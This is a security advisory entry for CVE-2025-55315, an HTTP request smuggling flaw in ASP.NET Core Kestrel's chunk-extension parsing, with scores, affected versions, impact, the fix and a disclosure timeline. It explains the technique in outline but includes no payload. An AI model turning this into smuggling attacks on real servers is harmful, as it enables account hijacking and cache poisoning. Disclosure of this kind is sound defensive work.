Download our Latest Industry Report – Continuous Offensive Security Outlook 2026

Download Report
Back to Vulnerability List

Microsoft: ASP.NET Core Kestrel HTTP Request Smuggling via Chunk Extension Parsing

CVE-2025-55315 Critical Published
CVSS
9.9 Critical · Network · Low PR
EPSS
0.01284 1.3% chance of exploit in 30d
CWE
CWE-444 Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling)
Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Summary

Per Praetorian’s blog: “While testing different implementations, I found that ASP.NET Core‘s Kestrel server was vulnerable to request smuggling through malformed chunked transfer encoding extensions. … I then sent the following malformed HTTP request with a newline character (n) embedded in the chunk extension … The server only echoed back xy, indicating that nxx was being treated as part of the chunk extension. This parsing leniency creates a TERM.EXT vulnerability: When deployed behind front-end proxies that interpret the lone n as a line terminator, this enables request smuggling.” NVD describes the issue as “Inconsistent interpretation of HTTP requests (‘http request/response smuggling’) in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.”

Affected Packages / Versions

  • Package: ASP.NET Core (Kestrel)
  • Latest published version at triage time: Pre-October 14, 2025 ASP.NET Core servicing release
  • Affected range: Multiple ASP.NET Core servicing tracks per Microsoft's October 14, 2025 advisory (MSRC page is JS-rendered; see MSRC for specific tracks)
  • Patched version: October 14, 2025 ASP.NET Core servicing release

Impact

Per Praetorian’s blog (general request-smuggling framing): “Examples of what these malicious requests can do include bypassing front-end security controls, hijacking user accounts, performing requests on behalf of victims, and poisoning the web server’s cache to serve malicious content.”

Severity Rationale

Per Praetorian’s blog: “The vulnerability garnered significant media attention after Microsoft assigned it a CVSS score of 9.9, the highest severity rating ever assigned to an ASP.NET Core vulnerability.” NVD records CVSS 9.9 (Critical) with scope-changing impact.

Fix

Apply the October 14, 2025 ASP.NET Core servicing release. Praetorian received a $10,000 bug-bounty award from Microsoft for this finding.

Disclosure timeline

  • Jun 22, 2025Reported to vendor (per Praetorian cve-research listing)
  • Oct 14, 2025Patch released (Microsoft October 2025 servicing)
  • Oct 14, 2025Public disclosure (Microsoft advisory)

Fix Commit(s)

    References

    Discovered by Siddhant Kalgutkar · Published April 29, 2026